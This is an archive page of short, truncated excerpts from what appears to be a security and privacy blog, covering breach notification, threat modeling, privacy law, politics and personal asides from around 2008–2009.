This year’s Computers, Freedom and Privacy Conference will feature a research showcase in the form of a research poster session as well as a research panel that includes the authors of the best research posters. CFP is the leading policy conference exploring the impact of the Internet, computers, and communications technologies on society. For more […]

 

I Know What I Know

and I’ll sing what he said. Ethan Zuckerman has two great posts lately: “From protest to collaboration: Paul Simon’s “Graceland” and lessons for xenophiles” and “Argentine economics and maker culture.” The Paul Simon post talks about the deep history of the Apartheid boycott, Paul Simon’s approach to creating Graceland. Graceland was a collaboration of the […]

 

Mo-mentum on centralized breach reporting?

A Missouri state bill requiring notification of the state attorney general as well as of individuals whose records have been exposed just took a step closer to becoming law. As reported in the St. Louis Business Journal on April 1: Missouri businesses would be required to notify consumers when their personal or financial information is […]

 

Torture is a Best Practice

I was going to title this “Painful Mistakes: Torture, Boyd and Lessons for Infosec,” but then decided that I wanted to talk about torture in a slightly different way. The Washington Post reports that “Detainee’s Harsh Treatment Foiled No Plots” and [UK Foreign & Commonwealth Office] Finally Admits To Receiving Intelligence From Torture. From the […]

 
 

Metricon 4.0 Call for Papers

I suspect at least some EC readers will be interested in the Call for Papers for Metricon 4.0, to be held in Montreal, August 11. Metricon 4 – The Importance of Context MetriCon 4.0 is intended as a forum for lively, practical discussion in the area of security metrics. It is a forum for quantifiable […]

 

Would I self-publish?

A few weeks back, Dave Birch asked me if I’d publish my next book myself. I don’t think I would. I’m really happy with Karen Gettman and Jessica Goldstein at Addison Wesley, and I’ve convinced my co-authors for my next book that we should have a discussion about publishers. So why am I happy with […]

 

Brad DeLong on the bailout

Brad DeLong has a FAQ up about Geithner’s plan to purchase toxic assets on the theory that the market has undervalued them, and will in time price them properly. Among the items: Q: What if markets never recover, the assets are not fundamentally undervalued, and even when held to maturity the government doesn’t make back […]

 

Best Practices?

The BBC reports that the UK Local Government Association has a new banned words list, including our favorite, “best practices.” Andrew asked me in email if this was a best practice, and I wrote back: Does it pass the seven whys test? Why did they ban the phrase? Because it’s meaningless business speak Why is […]

 

Double-take Department, Madoff Division

The Daily Beast has a fascinating article that is a tell-all from a Madoff employee. I blinked as I read: The employee learned the salaries of his colleagues when he secretly obtained a document listing them. “A senior computer programmer would make $350,000, where in most comparable firms they would be getting $200,000 to $250,000….” […]

 

The Emergent Chaos of Kutiman

So when someone sent me a link to “The Mother of all Funk Chords,” they didn’t explain it, and I didn’t quite get what I was watching. What I was watching: …is a mash up of videos found on YouTube, turned into an entire album by an Israeli artist, Kutiman.

 

Joseph Ratzinger and Information Security

Joseph Ratzinger (a/k/a Benedict XVI) made some comments recently made some comments that got some press. In particular, as Reuters reports: “Pope in Africa reaffirms ‘no condoms’ against AIDS.” Quoting the story, “The Church teaches that fidelity within heterosexual marriage, chastity and abstinence are the best ways to stop AIDS.” Many of you are likely […]

 

"No Evidence" and Breach Notice

According to ZDNet, “Coleman donor data breached in January, but donors alerted by Wikileaks not campaign:” Donors to Minnesota Senator Norm Coleman’s campaign got a rude awakening this week, thanks to an email from Wikileaks. Coleman’s campaign was keeping donor information in an unprotected database that contained names, addresses, emails, credit card numbers and those […]

 

Twitter + Cats = Awesome

My smart friend James Thomson of TLA Systems has created a new benchmark in iPhone applications, Twitkitteh. Not only is it the first Twitter client for cats, but it might also be the first iPhone app for cats, as well. I’ve always accused my cats of playing the stereo when I’m not there, and it […]

 

Understanding Users

Paul Graham has a great article in “Startups in 13 Sentences:” Having gotten it down to 13 sentences, I asked myself which I’d choose if I could only keep one. Understand your users. That’s the key. The essential task in a startup is to create wealth; the dimension of wealth you have most control over […]

 

What you talkin' 'bout?

The 110-story Sears Tower, tallest office building in the Western Hemisphere, will be renamed the Willis Tower, global insurance broker Willis Group Holdings said on Thursday. Willis said it was leasing multiple floors in the 1,451-foot (442-meter) structure in downtown Chicago to consolidate offices. As part of the deal, it will become the Willis Tower […]

 

Open Thread

I’d give you a topic, but I’m taking Hilzoy’s advice and going Galt. I’ve taken ads off the blog, given up my lucrative contract for Harry Potter and the Half-Baked Firewall, and so turn this thread over to you with but a single request: civility. So what’s on your mind?

 

The Lastest Big Processor Breach

So it’s now roughly confirmed, except for a few denials from Visa. First there was CardSystems, then Heartland, and maybe there’s at least one more known-to-some criminal breach at a payments processor. A lot of security bloggers have been talking about this, but I figure another day, another breach. Can’t we just get some facts? […]

 

This Data Will Self-Destruct in 5 Seconds

CSO Online has a good article on data destruction, Why Information Must Be Destroyed.” It’s mostly about physical documents, not data, but I can still make a few quibbles. The author, Ben Rothke, gives an example of a financial institution that did not live up to its regulatory requirements for properly disposing documents, and was […]

 

Welcome To The (New) Machine

If you can read this, you are now reading Emergent Chaos on its new server. We’ve also upgraded to the 4.x train of MovableType. Let us know what you think. We’re also considering a site redesign, so let us know any feature requests or design suggestions. Thanks!

 

SDL Threat Modeling Tool 3.1.4 ships!

On my work blog, I wrote: We’re pleased to announce version 3.1.4 of the SDL Threat Modeling Tool. A big thanks to all our beta testers who reported issues in the forum! In this release, we fixed many bugs, learned that we needed a little more flexibility in how we handled bug tracking systems (we’ve […]

 

Security Breach Notification Symposium

Next Friday (March 6th) I’ll be speaking at the “Security Breach Notification Symposium:” A one-day symposium on identity theft and security breaches. Experts from law, government, computer science, and economics will discuss laws that protect personal information and suggest reforms to strengthen them. Although most agree that reforms are needed, leading thinkers clash on what […]

 

Congratulations, Justin!

Justin Mason has won the 2009 Irish Blog Award for Best Technology Blog/Blogger. I don’t know how Justin manages to stay engaged with his blog and others while getting so much work done. When I say others, I mean this blog. Justin found Emergent Chaos back when it was a solo gig and I was […]

 

Don't put Peter Fleischer on Ice

Peter Fleischer is Google’s chief privacy counsel. I met Peter once at a IAPP event, and spoke pretty briefly. We have a lot of friends and colleagues in common. He’s now threatened with three years of jail in Italy. Google took under 24 hours to remove a video which invaded the privacy of someone with […]

 

Who Watches the FUD Watcher?

In this week’s CSO Online, Bill Brenner writes about the recent breaks at Kaspersky Labs and F-Secure. You can tell his opinion from the title alone, “Security Vendor Breach Fallout Justified” in his ironically named “FUD watch” column. Brenner watched the FUD as he spreads it. He moans histrionically, When security is your company’s business, […]

 

MI5 Head Critiques Government on Liberties

The BBC reports: A former head of MI5 has accused the government of exploiting the fear of terrorism to restrict civil liberties. Dame Stella Rimington, 73, stood down as the director general of the security service in 1996…”Furthermore it has achieved the opposite effect – there are more and more suicide terrorists finding a greater […]

 

Closing the Collapse Gap

There’s a very interesting annotated presentation at “Closing the ‘Collapse Gap’: the USSR was better prepared for collapse than the US.” In it, Dmitry Orlov lays out his comparison between the USSR and the USA of 2006. Posting this now because a talk he gave at Long Now is getting lots of attention. In closely […]

 
 

Daily Show on Privacy

(h/t to Concurring Opinions) The Daily Show With Jon StewartM – Th 11p / 10c Bill O’Reilly’s Right to Privacy Daily Show Full EpisodesImportant Things With Demetri Martin Funny Political NewsJoke of the Day

 

Why Didn't SOX Catch The Bank Failures?

Iang recently indicted the entire audit industry with “Two Scary Words: Sarbanes-Oxley”. I’ve excerpted several chunks below: Let’s check the record: did any audit since Sarbanes-Oxley pick up any of the problems seen in the last 18 months to do with the financial crisis? No. Not one, not even a single one! Yet, the basic […]

 

$450 per account? No.

So there’s a claim going around, which is that I believe that a breach costs $450 per account. That claim is not accurate. What was said (and the interview was in email, so I can quote exactly): (Interviewer) The Hannaford breach resulted in more than $318,000 in gross fraud losses, according to data reported by […]

 

"A Scientific R&D Approach to Cyber Security"

Charlie Catlett, CIO of Argonne National Labs has released a report on “A Scientific R&D Approach to Cyber Security” (Powerpoint summary, community wiki). It’s a very interesting report. There’s a lot to agree with in terms of a research agenda. They’re looking to compose trustworthy systems from untrusted components, to create self-protective data and software, […]

 
 

Public Perception of Security

So the US Consulate in Jerusalem sold a file cabinet full of secret documents. What I found interesting about the story is the perception of the finder: Hundreds of files — with social security numbers, bank account numbers and other sensitive U.S. government information — were found in a filing cabinet purchased from the U.S. […]

 

That's some fine discourse, Professor Froomkin

I just wanted to draw attention to the comments in Michael Froomkin’s blog post on “Cabinet Confirmation Mechanics.” I am delighted to have had ‘Jim’ concur with my Constitutional analysis by quoting the closing lines of Ulysses. I’m in awe of your commenters, Michael.

 

"EPC RFID Tags in Security Applications"

I just finished an interesting paper, K. Koscher, A. Juels, T. Kohno, and V. Brajkovic. “EPC RFID Tags in Security Applications: Passport Cards, Enhanced Drivers Licenses, and Beyond.” In the paper, they analyze issues of cloning (easy) read ranges (longer than the government would have you believe) and `design drift’ (a nice way of saying […]

 
 

Request your travel records

Speaking of how you’re presented and perceived…”How to request your travel records,” by Ed Hasbrouck. By popular demand, I’m posting updated forms to request your PNR’s and other records of your international travel that are being kept by the U.S. Customs and Border Protection (CBP) division of the Department of Homeland Security (DHS)… If you […]

 

A nudge in the right direction?

I am surprised I hadn’t heard about the book Nudge, by Cass Sunstein and Richard Thaler. I haven’t read it yet, but from the web page it seems to be about how policymakers can take into account the heuristics and biases characteristic of human decision-makers and create a choice architecture which yields “proper” decision-making. I […]

 

Abuse of the Canadian Do Not Call List

The Globe and Mail and the CBC each report that Canada’s Do Not Call list is being used by telemarketers both good and bad (where each term is relative). This is a bit sad for Canada. The US’s DNC list has been very successful, and one of the very few places where the US has […]

 

The New Administration and Security

Quoting first from Obama’s inaugural address: The question we ask today is not whether our government is too big or too small, but whether it works — whether it helps families find jobs at a decent wage, care they can afford, a retirement that is dignified. Where the answer is yes, we intend to move […]

 

Pinch me…

The Freedom of Information Act should be administered with a clear presumption: In the face of doubt, openness prevails. The Government should not keep information confidential merely because public officials might be embarrassed by disclosure, because errors and failures might be revealed, or because of speculative or abstract fears. Nondisclosure should never be based on […]

 

Breach Misdirection

While we were all paying attention to the Inauguration and having merry debates about how many Justices can deliver the Oath of Office on a pin, what may be the biggest breach ever tried to tiptoe past. Heartland Payment Systems may have lost 100 million credit card details, surpassing the 94 million that was lost […]

 

Rethinking Risk

Now it’s no secret to those of you who know me that I’m a big believer in using risk management in the security space. Iang over at Financial Cryptography think’s it is “a dead duck”: The only business that does risk management as a core or essence is banking and insurance (and, banking is debatable […]

 

President for Ten Minutes

During a chat I had this afternoon, someone brought up an interesting situation to contemplate. The Presidency of George Bush fils ended today at noon EST, but Mr. Obama wasn’t sworn in until 12:10. Who then, the question was, President during those ten minutes. One mildly unsatisfactory answer is Ms. Pelosi. If there is neither […]

 

Change I Can Believe In

From (the new) Whitehouse.gov: Except where otherwise noted, third-party content on this site is licensed under a Creative Commons Attribution 3.0 License. Visitors to this website agree to grant a non-exclusive, irrevocable, royalty-free license to the rest of the world for their submissions to Whitehouse.gov under the Creative Commons Attribution 3.0 License. http://www.whitehouse.gov/copyright/

 

Three short comments on the Inauguration

The reality that a black man is about to become President of the United States is both momentous and moving. It’s hard to say anything further on the subject that hasn’t been said and re-said, but I am simply proud that the pendulum has swung to someone like Obama. I’m excited to have an educated, […]

 

Umami, or why MSG tastes so good

It’s appetizing news for anyone who’s ever wanted the savory taste of meats and cheeses without actually having to eat them: chemists have identified molecular mechanisms underlying the sensation of umami, also known as the fifth taste. … The umami receptor’s shape is similar to that of sweetness receptors, he said, and his team’s research […]

 

Privacy & Healthcare

One of the dirty little secrets of bad privacy law is that it kills. People who are not comfortable with the privacy of their medical care may avoid getting needed care. That’s why privacy features in the Hippocratic oath. But few people want to study this issue, and studying it is hard–people are likely to […]

 

"Get FISA Right" Pointer

[Update: This got to #5 on change.org’s list, and they’re now working to draw attention to the issue on change.gov.] Jon Pincus has asked me for help in drawing attention to his “Get FISA Right” campaign to get votes on change.org. When I’ve tried to look at this, it’s crashed my browser. YMMV–I use a […]

 

Security Blog Awards

In “The Social Security Blogger Awards,” Alan Shimel asks for nominations for blogs. Ironically, to even see the site at http://www.socialsecurityawards.com/, you need to accept Javascript. I think we should have an award for “best vuln in the voting system.” But anyway, please take a minute to go vote. I’ll ask for your vote for […]

 

Patch and Pray…

..or, Spaf‘s DVD players get bricked. In which, lies a tale…

 

Protection Poker

Listening to Gary McGraw’s Silver Bullet #33, Laurie William mentioned protection poker. Protection poker, like planning poker isn’t really poker. Planning poker is a planning exercise, designed to avoid certain common pitfalls of other approaches to planning. The idea behind protection poker is to be a “informal form of misuse case development and threat modeling […]

 

Look how hip I am…

Normally, this would be something for Twitter, but…well…. Officiating at the NY v. Philadelphia game has been poor. Not biased, I don’t think, but poor.

 

Gary McGraw and Steve Lipner

Gary McGraw has a new podcast, “Reality Check” about software security practitioners. The first episode features Steve Lipner. It’s some good insight into how Microsoft is approaching software security. I’d say more, but as Steve says two or three good things about my threat modeling tool, you might think it some form of conspiracy. You […]

 

Reboot the FCC? No, debug the problem

Larry Lessig has a very interesting article in Newsweek, “Reboot the FCC.” The essence is that the FCC is inevitably bound by regulatory capture. He proposes a new agency with three tasks: “The iEPA’s first task would thus be to reverse the unrestrained growth of these monopolies.” “The iEPA’s second task should be to assure […]

 

No Fun

Stooges guitarist Ron Asheton, dead at 60.

 

ITRC Year End Report for 2008

The Identity Theft Resource Center (ITRC) released their year-end breach report: Reports of data breaches increased dramatically in 2008. The Identity Theft Resource Center’s 2008 breach report reached 656 reported breaches at the end of 2008, reflecting an increase of 47% over last year’s total of 446. Dissent of PogoWasRight has some analysis. I’ll take […]

 

Cryptol Language for Cryptography

Galois has announced “” Cryptol is a domain specific language for the design, implementation and verification of cryptographic algorithms, developed over the past decade by Galois for the United States National Security Agency. It has been used successfully in a number of projects, and is also in use at Rockwell Collins, Inc. … Cryptol allows […]

 

The Identity Divide and the Identity Archepelago

(I’d meant to post this in June. Oops! Chaos reigns!) Peter Swire and Cassandra Butts have a fascinating new article, “The ID Divide.” It contains a tremendous amount of interesting information that I wasn’t aware of, about how infused with non-driving purposes the drivers license is. I mean, I know that the ID infrastructure, is, […]

 

Security through obscurity

…or, antique car collectors are an honest lot. According to the Times (of London, dear chap), a recently-deceased British surgeon has left his heirs a rather significant bequest: a super-rare, super-fast, antique Bugatti which hasn’t been driven since 1960 and is expected to fetch several million at auction. This is the fabled “Imagine their surprise, […]

 

Biometric Fail reported

A South Korean woman entered Japan on a fake passport in April 2008 by slipping through a state-of-the-art biometric immigration control system using special tape on her fingers to alter her fingerprints, it was learned Wednesday… During questioning, the woman allegedly told the immigration bureau that she had bought a forged passport from a South […]

 

Happy New Year!

Our new year’s resolution is to show a sense of childlike wonder at and acceptance of everything we come across, especially this year’s leap second. Incidentally, this post is scheduled to go live at 2008-12-31 23:59:60. Let’s see what happens! Update: Movable Type complained when I tried to save the post: “Invalid date ‘2008-12-31 23:59:60’; […]

 

Now will you believe MD5 is broken?

I’m just sitting here blinking, having a Brecht moment in which I am laughing at those who are crying and crying at those who are laughing. At the CCC congress, a number of people did something dramatic — they created a forged SSL certificate. It’s dramatic, but nothing special. We’ve known that MD5 is broken […]

 

Happy Newton, everyone!

In honor of Newton’s Birthday festival, I therefore propose the following song, to be sung to the tune of “The Twelve Days of Christmas.” For brevity, I include only the final verse. All together now! On the tenth day of Newton, My true love gave to me, Ten drops of genius, Nine silver co-oins, Eight […]

 

I miss Montreal

When Seattle is covered in snow, it’s easy to miss Montreal. Now, folks in areas that get lots of snow like to make fun of Seattlites for being unable to handle a little snow, but it turns out that there’s another reason (beyond the steep hills) the city has a (ahem) unique approach: “Seattle refuses […]

 

At the tail end of the car series…

Originating from Wootton High School, the parent said, students duplic ate the license plates by printing plate numbers on glossy photo paper, using fonts from certain websites that “mimic” those on Maryland license plates. They tape the duplicate plate over the existing plate on the back of their car and purposefully speed through a speed […]

 

Designing Cars

I was struck by this quote in “Edgy, Yet Still Aerodynamic” an article in the New York Times about how new cars are being designed and tested: , To his surprise, in hundreds of tests at Ford’s Wind Tunnel 8 southwest of Detroit the original edges produced less drag than curved substitutes, Mr. Koester said. […]

 

This is the farewell shoe, you dog

Bloomberg is reporting that “Shoe Hurled at Bush Flies Off Turkish Maker’s Shelves : Baydan has received orders for 300,000 pairs of the shoes since the attack, more than four times the number his company sold each year since the model was introduced in 1999. The company plans to employ 100 more staff to meet […]

 

Thoughts on the Somali Pirates

Stratfor’s podcast on the seizure of that Saudi oil tanker contained a fascinating tidbit: merchant ships are no longer allowed to carry arms at all, which, of course, makes piracy far easier. This is a dramatic transformation of the rights of merchant ships. Historically, private ships carried weapons when sailing far out of their own […]

 

Evidence of Time Travel Found in China

According to Ananova, a Swiss watch-ring has been found covered in dirt in a four-hundred year old Ming dynasty tomb. The watch was found, covered in dirt. It was stopped at the time 10:06 and has the word, “Swiss” engraved on the back. The archaeologists on the dig have requested archaeologists from Beijing to help […]

 

Happy Boston Tea Party Day!

It was 235 years ago today that the Sons of Liberty threw tea into Boston harbor, and they still haven’t been able to clean the place up. Please join me in celebrating this most American response to taxation.

 

Do Security Breaches Cost Customers?

Adam Dodge, building on research by Ponemon and Debix, says “Breaches Cost Companies Customers,” and Alan Shimel dissents in “Do data breaches really cost companies customers?” Me, I think it’s time we get deeper into what this means. First, the customers. Should they abandon a relationship because the organization has a security problem? To answer […]

 

Privacy Rights & Privacy Law

First, the European Court of Human Rights has ruled that the UK’s “DNA database ‘breach of rights’:” The judges ruled the retention of the men’s DNA “failed to strike a fair balance between the competing public and private interests,” and that the UK government “had overstepped any acceptable margin of appreciation in this regard”. The […]

 

Eric Drexler blogging

At Metamodern.com. Way cool. I look forward to what he has to say. Unfortunately, one of his early posts falls into the trap of believing that “Computation and Mathematical Proof” will dramatically improve computer security: Because proof methods can be applied to digital systems, and in particular, will be able to verify the correctness (with […]

 

DataLossDB announces awesome new feature

The Data Loss Database, run by the Open Security Foundation, now has a significant new feature: the inclusion of scanned primary source documents. This means that in addition to being able to determine “the numbers” on an incident, one can also see the exact notification letter used, the reporting form submitted to state government, cover […]

 

Videos of me

The employer has been posting them at a prodigious rate. There’s: “Threat Modeling at EMC and Microsoft,” Danny Dhillon of EMC and myself at BlueHat. Part of the BlueHat SDL Sessions. Also on threat modeling, Michael Howard and I discuss the new SDL Threat Modeling Tool Michael Howard and I also discussed the new SDL […]

 

The Costs of Fixing Problems

I enjoyed reading Heather Gerkin’s article: “The Invisible Election.” I am one of the few people to have gotten a pretty good view of the invisible election, and the reality does not match the reports of a smooth, problem-free election that have dominated the national media. As part of Obama’s election protection team, I spent […]

 

Virgin America

I flew Virgin Atlantic for the first time recently, for a day trip to San Francisco. I enjoyed it. I can’t remember the last time I actually enjoyed getting on a plane. The first really standout bit was when the Seattle ground folks put on music and a name that song contest. They handed out […]

 
 

Travel Chaos

NARA (National Archives) published notice in the Federal Register on October 27, 2008, of TSA’s submission to them (see Schedule Pending #3) of a proposed Records Schedule for Secure Flight Program. The actual Proposed Schedule was not published in the Register, only notice that you can request it and file comments on whether NARA should […]

 

Terrifying Financial Blacklists Falling Down

There’s a list, maintained by the UN security council, of people who can’t have their money. Once you’re on the list, there’s no way to get off. The global blacklisting system for financiers of al-Qaeda and other terrorist groups is at risk of collapse, undermined by legal challenges and waning political support in many countries, […]

 

Ephemeral Anniversary

Yesterday, Nov 17, was the sesquicentenary of the zero-date of the American Ephemeris. I meant to write, but got distracted. Astronomical ephemeris counts forward from this date. That particular date was picked because it was (approximately) Julian Day 1,000,000, but given calendar shifts and all, one could argue for other zero dates as well. The […]

 

Diverse Preferences for Privacy

A Wide Diversity of Consumer Attitudes about Online Privacy shows this picture of Flickr users setting privacy preferences: green is public (default) and red is private. I hope Flickr shares some of the underlying data. I don’t know what anyone would do with it, and there’s two ways to find out. One is to talk, […]

 

The Twain Meeting

Some time ago, was on an extended stay in Tokyo for work. When one is living there, there are things one must do, like make an effort to live up to being a henna gaijin. I must disagree with those who translate that as “strange foreigner.” The proper translation is “crazy foreigner.” I’d never heard […]

 

Actually, Randall, We Tried That

And the reason it doesn’t work is that just because you’re allowed to own something doesn’t mean you’re allowed to export it. The use, ownership, production, etc. of crypto was never restricted, only its export. In an Intenet-enabled world, export control brings lots of hair with it, which is why it was important to fight […]

 

Public Policy and InfoSec

…Armed with my favorite govie (who is actually the lead on this, I’m just a straphanger), The New School of Information Security (Hi Adam and Andrew), some government policy directives, and the National Strategy to Secure Cyberspace, I am teaching an Information Security Management and Public Policy class for Carnegie Mellon’s Heinz School. The more […]

 

An early clue to the new direction?

Obama gave his first press conference as President-elect last Saturday. Pundits have noted his humor in responding to the urgent canine matter, but I was struck by a particular phrase used in response to a question regarding whether he’d be moving quickly to fill key cabinet positions: When we have an announcement about cabinet appointments, […]

 

Chaos, My Desk and Dilbert

The Wall St Journal covers the latest management fad in “Neatness Counts at Kyocera and at Others in the 5S Club:” 5S is a key concept of the lean manufacturing techniques that have made makers of everything from cars to candy bars more efficient. The S’s stand for sort, straighten, shine, standardize and sustain. Lately, […]

 

I Was On NPR, An Unmasking of Sorts

Okay so for a long time now, I’ve been blogging as Arthur. It all started as an excuse to blog without the company I worked for at the time having to worry about anything I said being a reflection on them. Almost three years ago they were acquired by Oracle and I have long since […]

 

Checking in on the Security of Chequing

I remember a conversation back in 1995 or 1996 with someone who described to me how the Automated ClearingHouse (ACH) for checking worked. He explained that once you had an ACH merchant account, you sent in a message of roughly the form (src, dest, amount, reason) and money got moved. I argued with him that […]

 

This just in!!

MSNBC’s live streaming internet election coverage looks like it was filmed from within Second Life. Yuck.

 

The Purple States

As we go into what may well be another very long day of elections for the Presidency of the United States, I wanted to reprise two images from 2004: Click on either for more details and the context four years ago. Despite the electoral college, America isn’t a red country or a blue country, and […]

 

You talk like a delinquent

This is interesting. Not sure how robust the finding is, but according to an analysis of LendingClub data on all past loans, including descriptions of the use for the money, applicants using certain words in their descriptions are much more likely to default. For our purposes define a Delinquency as either being late in your […]

 

Thoughts about Democracy in America

There’s a place in de Tocqueville where he talks about America’s civic strength coming from the way we organize: those voluntary organizations which come together to solve a problem as a community. He pointed out that what we got from that was not merely that particular problem solved, but a sense of community and a […]

 

It was twenty years ago today

It was twenty years ago today Sgt. Morris taught the worms to play They’ve been going in and out of style But they’re guaranteed to last a while So may I introduce to you… the bug you’ve known for all these years Sgt. Morris Lonely worm club band We’re Sgt. Morris’ lonely worm club band, […]

 

Don’t Stay at the Renaissance Amsterdam Hotel

The night of September 29th, I had a room at the Renaissance Amsterdam hotel on Kattengat street. Actually I had two rooms, not that I slept in either of them. The first had too much street noise, and windows that didn’t block out the sound. The second, well, I woke up at 7.30 AM from […]

 

Cheetah Delays Luggage

A cheetah traveling from Oregon to Memphis Tennessee escaped from its cage on a Delta flight from Portland to Atlanta. Luggage was delayed, a baggage worked got a good fright (oh, yeah, imagine finding a cheetah on Halloween), but no baggage was destroyed. I would like to be able to link to the full story, […]

 

Studs Terkel, 1912-2008

No Chicagoan stood up for the common man like Studs Terkel, although Nelson Algren was probably in the running. A security-related anecdote, courtesy of the Chicago Tribune: In 1997 he went to the White House to receive the National Humanities Medal and the National Medal of Arts with a group including Jason Robards, Angela Lansbury, […]

 

Experience and Decision Making

Following on our satirical endorsement of McCain-Palin yesterday, I’d like to talk a little about the experience argument, that is, that Obama lacks the experience to be President. This may well be true. I’d prefer someone with extensive executive experience, ideally running a state, experience matters in one very specific way: it may help you […]

 

Responses to Terror: Boston and Ashdod, Israel

An Israeli teenager has been arrested after he donned a mask and prowled the streets of his town with a big rucksack and toy gun for a school project. The boy, 15, was seized by police in the southern town of Ashdod suspecting he was a Palestinian militant. The student was quoted as saying he […]

 

CTOs, Product Management and Program Management

In “The product manager’s lament,” Eric Ries writes about his view of product managers: Let’s start with what the product manager does. He’s supposed to be the person who specifies what the product will do. He writes detailed specs which lay out exactly what features the team should build in its next iteration. These specs […]

 

Ridiculing the Ridiculous: Terrorist Tweets

A group of soldiers with the US Army’s 304th Military Intelligence Battalion have managed to top previous military research on terrorist use of World of Warcraft. Realizing that mentioning the word “terrorist” can allow researchers to acquire funding to play the popular MMOG, they turned attention to the popular, if architecturally unscalable micro-blogging system, Twitter. […]

 

"Secure Flight" now part of the Bush Administrations Legacy

We welcome the Bush administration’s continuing dedication to excellence and security in developing clear and appropriate rules to prevent terrorists from flying: In this respect, there are major discrepancies between the (nonbinding) description at the start of the regulatory notice issued today, and the actual regulations that follow it (the last 20 pages of the […]

 

Buffett Vs Paulson

I was listening to Joseph Stiglitz on NPR this morning, and he had a very interesting comparison. (Quoting from an op-ed in the Guardian): For all the show of toughness, the details suggest the US taxpayer got a raw deal. There is no comparison with the terms that Warren Buffett secured when he provided capital […]

 

The Costs of Secrecy

Security continues to be crippled by a conspiracy of silence. The ongoing costs of not talking about what’s going wrong are absolutely huge, and today, we got insight into just how huge. Richard Clayton and Tyler Moore of Cambridge University have a new paper on phishing, “The consequence of non-cooperation in the fight against phishing.” […]

 

Investing in the finance crisis

The Wall Street domino has toppled just about everything in sight: U.S. stocks large and small, within the financial industry and outside of it; foreign stocks; oil and other commodities; real-estate investment trusts; formerly booming emerging markets like India and China. Even gold, although it has inched up lately, has lost 10% from its highs […]

 

Open thread

What’s on your mind in October?

 

Emergence Emerges

This paper, “More Really is Different,” may be one of the most important papers of the last half-millenium. It argues that P.W. Anderson’s concept of “emergence” is provable. It may have even proved it. The idea of emergence, from whence this blog gets its name is the opposite of reductionism. It is the idea that […]

 

Death Penalty Protestors are Terrorists

The Washington Post reports upon the further cheapening of the word “terrorism” in, “Md. Police Put Activists’ Names On Terror Lists.” The fifty-three people with “no evidence whatsoever of any involvement in violent crime” who were put on a list of terrorists include anti-death-penanty protestors. It’s really hard to keep from laughing about this. Are […]

 

Identity Manglement

It was Dopplr that drove me over the edge on this rant. I almost feel bad for starting off with them, because as you will see, they’re just the bale of hay that broke the camel’s back. I was updating my travel schedule, which included a trip to St. Louis. It told me that by […]

 

Experiences Threat Modeling at Microsoft

A little bit of cross-polination between blogs: Adam Shostack here. Last weekend, I was at a Security Modeling Workshop, where I presented a paper on “Experiences Threat Modeling at Microsoft,” which readers of [the Microsoft Security Development Lifecycle] blog might enjoy. So please, enjoy!

 

"No evidence the data was misused"

The next time you read a statement that a breached entity has found no evidence of data misuse, remember this: data may have been misused even though entities are unaware of it. Tim Wilson of Dark Reading provides a current example of why entities should inform customers, this one involving the T-Mobile breach that affected […]

 

Researchers Two-Faced over Facebook Data Release

[Update: Michael Zimmer points out that it wasn’t Facebook, but outside researchers who released the data.] I wanted to comment quickly on an interesting post by Michael Zimmer, “ On the “Anonymity” of the Facebook Dataset.” He discusses how A group of researchers have released a dataset of Facebook profile information from a group of […]

 

What's in a name(less)?

Me! I had a great time in a conversation with Dennis Fisher which is now up on his nameless security podcast: Adam Shostack on privacy, data breaches and “The New School of Information Security” Check it out. Update: Amazon seems to be having trouble keeping The New School in stock. (Thank you!!!) Addison Wesley has […]

 
 

The Skype Issue

According to The New York Times in, “Surveillance of Skype Messages Found in China,” the Chinese provider TOM has software in place that reads Skype text messages, and blocks ones that use naughty words and terms, like “Falun Gong,” “Independent Taiwan,” and so on. A group of security people and human rights workers not only […]

 

Submitted for your consideration

I added Bank Lawyer’s Blog to my set of RSS feeds some time ago, after I came across a decent post about ID theft there. I provide — without comment — the following quotation from a banking industry lawyer, as posted yesterday: Near the end of the Oscar-winning movie “Unforgiven,” the young assassin who calls […]

 

Regulations, Risk and the Meltdown

There are obviously a large set of political questions around the 700+ billion dollars of distressed assets Uncle Sam plans to hold. If you care about the politics, you’re already following in more detail than I’m going to bother providing. I do think that we need to act to stem the crisis, and that we […]

 

Adam on CS TechCast

I did a podcast with Eric and Josh at CS Techcast. It was lots of fun, and is available now: link to the show Welcome to another CSTechcast.com podcast for IT professionals. This week we interview Adam Shostack, author of The New School of Information Security about the essentials IT organizations need to establish to […]

 

And I thought I didn't like Streisand

While Babs’ vocal stylings may be an “acquired taste”, today I have a new appreciation for the Streisand Effect. Thanks to Slashdot, I learned that Thomson Reuters is suing the Commonwealth of Virginia alleging that Zotero, an open-source reference-management add-on for Firefox, contains features resulting from the reverse-engineering of Endnote, a competing commercial reference management […]

 

Blaming the Victim, Yet Again

John Timmer of Ars Technica writes about how we ignore dialog boxes in, “Fake popup study sadly confirms most users are idiots.” The article reports that researchers at the Psychology Department of North Carolina State University created a number of fake dialog boxes had varying sorts of clues that they were not real dialog boxes, […]

 

2008 Breaches: More or More Reporting?

Dissent has some good coverage of an announcement from the ID Theft Resource Center, “ITRC: Breaches Blast ’07 Record:” With slightly more than four months left to go for 2008, the Identity Theft Resource Center (ITRC) has sent out a press release saying that it has already compiled 449 breaches– more than its total for […]

 

University of Lake Wobegon?

Spaf has an excellent post up about Purdue’s decision to no longer be an NSA Center of Academic Excellence. He makes a number of thought-provoking points, among them that “excellence” loses its meaning if the bar is set too low, and that being an academic center and having a training (as opposed to educating) curriculum […]

 

SDL Press Tour Announcements

Steve Lipner and I were on the road for a press tour last week. In our work blog, he writes: Last week I participated in a “press tour” talking to press and analysts about the evolution of the SDL. Most of our past discussions with press and analysts have centered on folks who follow security, […]

 

Help fund historic computers at Bletchley Park

Bletchley Park, the site in the UK where WWII code-breaking was done, has a computing museum. The showpiece of that museum is Colossus, one of world’s first computers. (If you pick the right set of adjectives, you can say “first.” Those adjectives are apparently, “electronic” and “programmable.”) It has been rebuilt over the last fourteen […]

 

Canadian PM FAIL

Dear Mr Harper, In general people do not care for the government to be tracking their religious affiliation. In particular however, there are few groups who care less for this sort of tracking than Jews. Seriously, you’re not going to get votes by sending Rosh Hashanah cards to your Jewish constituents. It freaks us out, […]

 

Risk Managers Are Just Like Security People

Or is that vice-versa? A few weeks ago, Security Retentive posted about an article in the Economist: “Confessions of a Risk Manager”. Both his analysis and the original story are quite interesting and I encourage you to read them as well as a letter to the editor that was published in last week’s print edition […]

 

Things only An Astrologist Could Believe

There’s a really funny post on a blog titled “Affordable Indian Astrology & Vedic Horoscope Provider:” Such a choice of excellent Muhurta with Chrome release time may be coincidental, but it makes us strongly believe that Google may not have hesitated to utilize the valuable knowledge available in Vedic Astrology in decision making. This is […]

 

Signal Boosting Amrit Williams

